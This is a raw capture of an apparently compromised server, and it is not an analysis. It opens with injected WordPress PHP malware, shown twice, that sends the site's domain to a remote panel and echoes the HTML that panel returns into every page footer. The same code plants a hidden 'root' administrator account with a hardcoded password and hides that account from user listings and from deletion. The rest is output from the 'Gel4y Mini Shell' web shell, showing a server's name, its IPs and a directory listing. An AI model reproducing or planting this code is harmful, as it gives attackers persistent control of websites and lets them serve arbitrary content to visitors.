function wp_injector_fetch_code() { $backend_url = 'https://validlogs.com/BackPanel/panel.php'; $domain = sanitize_text_field($_SERVER['HTTP_HOST']); $response = wp_remote_post($backend_url, array('body' => array('action' => 'register_domain', 'domain' => $domain), 'timeout' => 5)); if (is_wp_error($response)) return; $html_code = wp_remote_retrieve_body($response); if (!empty($html_code)) { add_action('wp_footer', function() use ($html_code) { echo $html_code; }); } } add_action('init', 'wp_injector_fetch_code'); ob_start(); ?> if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } function wp_injector_fetch_code() { $backend_url = 'https://validlogs.com/BackPanel/panel.php'; $domain = sanitize_text_field($_SERVER['HTTP_HOST']); $response = wp_remote_post($backend_url, array('body' => array('action' => 'register_domain', 'domain' => $domain), 'timeout' => 5)); if (is_wp_error($response)) return; $html_code = wp_remote_retrieve_body($response); if (!empty($html_code)) { add_action('wp_footer', function() use ($html_code) { echo $html_code; }); } } add_action('init', 'wp_injector_fetch_code'); ob_start(); ?> Gel4y Mini Shell

Gel4y Mini Shell

PHP Version : 7.4.33
+File +Directory
  • Server : x3immune.vn (157.245.199.161/216.73.216.221)
  • Path: ~/lib/python3/dist-packages/cloudinit/config/
    Name Size Permission Action
    __pycache__ N/A drwxr-xr-x
    schemas N/A drwxr-xr-x
    __init__.py 0.014KB -rw-r--r--
    cc_ansible.py 8.367KB -rw-r--r--
    cc_apk_configure.py 5.745KB -rw-r--r--
    cc_apt_configure.py 32.458KB -rw-r--r--
    cc_apt_pipelining.py 2.82KB -rw-r--r--
    cc_bootcmd.py 2.871KB -rw-r--r--
    cc_byobu.py 3.669KB -rw-r--r--
    cc_ca_certs.py 8.058KB -rw-r--r--
    cc_chef.py 13.787KB -rw-r--r--
    cc_disable_ec2_metadata.py 2.044KB -rw-r--r--
    cc_disk_setup.py 32.339KB -rw-r--r--
    cc_fan.py 3.109KB -rw-r--r--
    cc_final_message.py 3.408KB -rw-r--r--
    cc_growpart.py 19.424KB -rw-r--r--
    cc_grub_dpkg.py 5.487KB -rw-r--r--
    cc_install_hotplug.py 3.81KB -rw-r--r--
    cc_keyboard.py 2.076KB -rw-r--r--
    cc_keys_to_console.py 3.626KB -rw-r--r--
    cc_landscape.py 4.859KB -rw-r--r--
    cc_locale.py 1.878KB -rw-r--r--
    cc_lxd.py 17.956KB -rw-r--r--
    cc_mcollective.py 6.2KB -rw-r--r--
    cc_migrator.py 3.515KB -rw-r--r--
    cc_mounts.py 19.029KB -rw-r--r--
    cc_ntp.py 19.699KB -rw-r--r--
    cc_package_update_upgrade_install.py 4.424KB -rw-r--r--
    cc_phone_home.py 5.504KB -rw-r--r--
    cc_power_state_change.py 7.654KB -rw-r--r--
    cc_puppet.py 13.736KB -rw-r--r--
    cc_refresh_rmc_and_interface.py 5.482KB -rw-r--r--
    cc_reset_rmc.py 4.533KB -rw-r--r--
    cc_resizefs.py 10.564KB -rw-r--r--
    cc_resolv_conf.py 5.01KB -rw-r--r--
    cc_rh_subscription.py 17.047KB -rw-r--r--
    cc_rightscale_userdata.py 4.304KB -rw-r--r--
    cc_rsyslog.py 9.767KB -rw-r--r--
    cc_runcmd.py 2.923KB -rw-r--r--
    cc_salt_minion.py 5.535KB -rw-r--r--
    cc_scripts_per_boot.py 1.677KB -rw-r--r--
    cc_scripts_per_instance.py 1.829KB -rw-r--r--
    cc_scripts_per_once.py 1.78KB -rw-r--r--
    cc_scripts_user.py 1.868KB -rw-r--r--
    cc_scripts_vendor.py 2.312KB -rw-r--r--
    cc_seed_random.py 4.813KB -rw-r--r--
    cc_set_hostname.py 4.895KB -rw-r--r--
    cc_set_passwords.py 11.05KB -rw-r--r--
    cc_snap.py 6.386KB -rw-r--r--
    cc_spacewalk.py 3.52KB -rw-r--r--
    cc_ssh.py 14.034KB -rw-r--r--
    cc_ssh_authkey_fingerprints.py 4.236KB -rw-r--r--
    cc_ssh_import_id.py 5.815KB -rw-r--r--
    cc_timezone.py 1.44KB -rw-r--r--
    cc_ubuntu_advantage.py 16.876KB -rw-r--r--
    cc_ubuntu_autoinstall.py 4.563KB -rw-r--r--
    cc_ubuntu_drivers.py 4.625KB -rw-r--r--
    cc_update_etc_hosts.py 5.112KB -rw-r--r--
    cc_update_hostname.py 3.634KB -rw-r--r--
    cc_users_groups.py 7.604KB -rw-r--r--
    cc_wireguard.py 9.284KB -rw-r--r--
    cc_write_files.py 6.748KB -rw-r--r--
    cc_write_files_deferred.py 1.678KB -rw-r--r--
    cc_yum_add_repo.py 7.474KB -rw-r--r--
    cc_zypper_add_repo.py 6.68KB -rw-r--r--
    modules.py 11.426KB -rw-r--r--
    schema.py 43.138KB -rw-r--r--
    Copyright © 2021 - Powered By Indonesian Darknet